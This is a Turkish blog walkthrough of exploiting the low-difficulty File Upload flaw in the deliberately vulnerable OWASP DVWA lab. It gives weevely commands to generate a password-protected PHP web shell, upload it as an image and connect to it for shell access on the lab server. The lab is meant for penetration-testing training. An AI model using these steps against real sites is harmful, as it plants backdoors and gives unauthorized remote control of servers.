OWASP DVWA – File Upload (Düşük Seviye): Dosya Yükleme Zafiyeti Bulunan Uygulamaya Weevely ile Hazırlanan PHP Dosyasının Yüklenmesi ve Kabuk Erişiminin Elde Edilmesi

Web uygulamaları sızma testleri sırasında hedef uygulama üzerindeki bir kontrol eksikliği sebebi ile hedef sunucuya beklenmedik tipte dosyalar yüklenebilir. Bu yazıda, OWASP DVWA (Damn Vulnerable Web App) üzerindeki düşük zorluk seviyesindeki File Upload açıklığı istismar edilecek ve hedef uygulamanın komut satırına erişim sağlanacaktır.

Mevcut uygulamada kullanıcıdan bir resim dosyası yüklenmesi beklenmektedir.

http://10.10.2.156/dvwa/vulnerabilities/upload/

 

Yüklenen resim dosyasının yeri de ekrana basılmaktadır. Bu bilgiye göre dosya, mevcut dizinin 2 üst dizininde bulunan “hackable/uploads” dizinine kaydedilmektedir.

../../hackable/uploads/Resim.jpg succesfully uploaded!

 

Kaydedilen resim ve resmin kaydedildiği dizin aşağıdaki gibidir.

http://10.10.2.156/dvwa/hackable/uploads/
http://10.10.2.156/dvwa/hackable/uploads/Resim.jpg

 

Gerekli kontrollerin yapılmadığı durumda hedef uygulamaya resim yerine başka dosyalar da yüklenebilir. Örneğin zararlı bir PHP sayfası hedef sunucuya yüklenebilir ve kabuk erişimi elde edilebilir. Bu amaçla Kali üzerinde weevely aracı kullanılarak bir web sayfası hazırlanabilir.

weevely generate Parola123 /var/www/html/zararli.php

 

Gerekli kontrolün yapılmadığı bu gibi bir durumda, hazırlanan dosya hedef sunucuya bir resim dosyası gibi yüklenir.

 

Sonra da yine weevely aracı ile bu dosya çağırılabilir.

weevely http://10.10.2.156/dvwa/hackable/uploads/zararli.php Parola123

 

Bunun yanında weevely aracına özel komutlar da kullanılabilir.

 

help

 

İlgili Kaynak Kod:

 

Kaynak:

http://www.includekarabuk.com/kategoriler/DVWAUygulamasi/Ders-11—File-Upload-Low-Level.php
https://null-byte.wonderhowto.com/how-to/slip-backdoor-into-php-websites-with-weevely-0175211/

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.